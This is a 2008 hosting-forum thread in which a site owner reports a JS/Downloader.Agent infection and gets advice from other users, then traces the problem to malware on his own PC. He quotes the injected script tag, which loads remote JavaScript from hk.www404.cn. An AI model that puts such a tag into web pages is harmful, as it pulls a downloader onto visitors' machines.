|
|
|
|
|
|||||||
| Register | FAQ | Members List | Calendar | Search | Today's Posts | Mark Forums Read |
| Virtual Private Servers (VPS) Need help with your VPS plan on HostICan? Please feel free to ask and we'll give you the answers! |
 |
|
|
LinkBack | Thread Tools | Display Modes |
06-13-2008, 03:44 AM
|
|||
|
|||
Site attacked by the JS/Downloader.Agent virus
Hello,
My site was infected by virus. I contacted the support, but they suggested to post about the issue here. Below is the text of our conversation. ---------------------------------------------------- Hey, Thanks for your reply. This is more of a programmer kind of question, something we are not really familuar with. Please post your question on our community forum at http://forum.hostican.com which will provide you with more info. -- -- Kind Regards, Samuel Flanders Hello Alex, Please visit the "http://spider-player.com/index.php" URL, as by just typing "http://spider-player.com" you will see the "site is under construction" message, which I placed intentionally, so that people won't see the issues or got infected until we fix this. You will see (or may not - as I said this happens randomly, for no apparent reason) that the "Today's Poll" module font size is much bigger than the font size of other site's modules. Also, the font size at the "http://spider-player.com/download" URL is too unusually big. And something is wrong with the "Login" button at "http://spider-player.com/administrator/". That's all I've noticed so far, but there might be something else. BUT, the thing I most concerned of is this line in the site's HTML code (press Ctrl+U, or Alt+F3 to view, or View->Source for IE): <script language="javascript" SRC="http://hk.www404.cn:53/ads.js"></script> I didn't place it there and I don't have it in my localhost copy of the site. Also, there are a lot of references to the hk.www404.cn:53/ads.js as a JS/Downloader.Agent virus. I hope, I made it clear enough now. Please, help me fix this! Regards, Vitaly HostICan | Support wrote: > Hello Vitaly, > Thank you for contacting HostICan support. > > I've checked your website: Spider Player Forum • Index page and found that it works well. > I didn't found any issues. > Please let us know if you have any further questions. > > Sincerely, > Alex Hardin --------------------------------------------------- EDIT: obviously, that's the virus (which, I guess, somewhere on your servers, as my localhost and other local files are clean) affects the way the site is displayed. Help me to get rid of it ASAP! Last edited by vitaly : 06-13-2008 at 03:56 AM. Reason: additional info 
|
|
06-13-2008, 11:34 AM
|
|||
|
|||
|
restore a backup until that file is no longer there.
Not many other options. If you cannot tell how it got there you have no way of knowing what else is changed on hour site. Chances are slim that it has anything to do with HostiCan. I would double check your file permissions and make sure nothing is writable. Last edited by ColumbusGEEK : 06-13-2008 at 11:39 AM.
|
|
06-13-2008, 03:38 PM
|
|||
|
|||
|
I apologize, it was really tricky to understand what truly happens. I checked my files on the server and they were clean too, just as my localhost files. So virus is probably in my local network or my computer. Looks like it intercepts the data and changes it before I see it in the browser... and it only does so for my site (maybe for some other, but I haven't noticed anything like this)... NOD32 doesn't detect this virus, so I had to download the tool (SmitfraudFix) that removed it in the safe mode, however, I got infected again a few hours later, because NOD32 missed it
 On some other forum I've read that AVG detects it, but unfortunately, it can't remove it...I will appreciate any help on this issue, thanks.
|
|
06-13-2008, 05:31 PM
|
||||
|
||||
|
Quote:
__________________
Thanks, Denis Motova Affiliate / Operations Manager HostICan Answers | HostICan Newsletter | HostICan Blog | Become a HostICan Affiliate | Create a Support Ticket.
|
|
| Thread Tools | |
| Display Modes | |
|
|
Linear Mode
